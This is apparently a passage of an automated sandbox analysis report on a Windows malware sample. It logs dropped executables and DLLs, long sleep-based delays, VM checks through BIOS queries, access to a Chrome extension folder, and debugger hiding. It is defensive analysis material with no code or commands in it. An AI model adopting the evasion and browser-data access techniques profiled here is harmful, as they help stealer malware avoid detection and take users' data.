Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 652
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3613
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2516
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 573
Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32event.pyd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90u.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32process.pyd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90u.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_tkinter.pyd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exe
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32trace.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\tk85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcm90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\bz2.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\eIgpINK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32api.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcp90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\win32ui.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\pywintypes27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\python27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_win32sysloader.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\tcl85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\pythoncom27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe TID: 6136Thread sleep time: -210000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 6376Thread sleep time: -40020s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 5176Thread sleep time: -34017s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 4648Thread sleep time: -44022s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 5960Thread sleep time: -36018s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe TID: 1772Thread sleep time: -50025s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep count: 1156 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep time: -2313156s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7768Thread sleep count: 1120 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7768Thread sleep time: -2241120s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776Thread sleep count: 1116 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776Thread sleep time: -2233116s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752Thread sleep count: 135 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752Thread sleep time: -4050000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep count: 1109 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep time: -2219109s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760Thread sleep count: 1125 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760Thread sleep time: -2251125s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep count: 152 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep time: -304152s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -100000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99863s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99727s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99598s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99456s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99339s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -99141s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98925s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98381s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98253s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -98119s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97971s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97838s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97701s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97579s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97428s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97307s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97185s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -97050s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -96931s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -96724s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -598111s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597950s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597794s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -597388s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 6720Thread sleep time: -596942s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 7004Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe TID: 1004Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 7383 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 2408 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe TID: 3912Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep count: 7410 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 2285 > 30
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5288Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe TID: 4084Thread sleep count: 619 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe TID: 5720Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep count: 3641 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948Thread sleep count: 1223 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 2909 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 743 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep time: -10145709240540247s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 812Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe TID: 628Thread sleep count: 332 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 3613 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe TID: 2860Thread sleep time: -240000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 2011 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628Thread sleep count: 360 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 2516 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 573 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C585070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,3_2_6C585070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46EBF0 PR_GetNumberOfProcessors,GetSystemInfo,3_2_6C46EBF0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 100000
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99863
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99727
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99598
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99456
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99339
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 99141
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98925
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98381
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98253
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 98119
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97971
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97838
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97701
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97579
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97428
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97307
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97185
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 97050
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 96931
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 96724
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 598111
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597950
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597794
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597388
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 596942
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeThread delayed: delay time: 30000
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                                    Source: 64252d274d.exe, 00000024.00000003.2465555446.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2568911959.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2390180371.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2510983657.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2443015883.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2511360727.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2439674022.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2466909262.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | API call chain: ExitProcess graph end node
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe | System information queried: ModuleInformation
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe | Process information queried: ProcessInformation

                                    Anti Debugging

                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe | System information queried: CodeIntegrityInformation
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe | Thread information set: HideFromDebugger
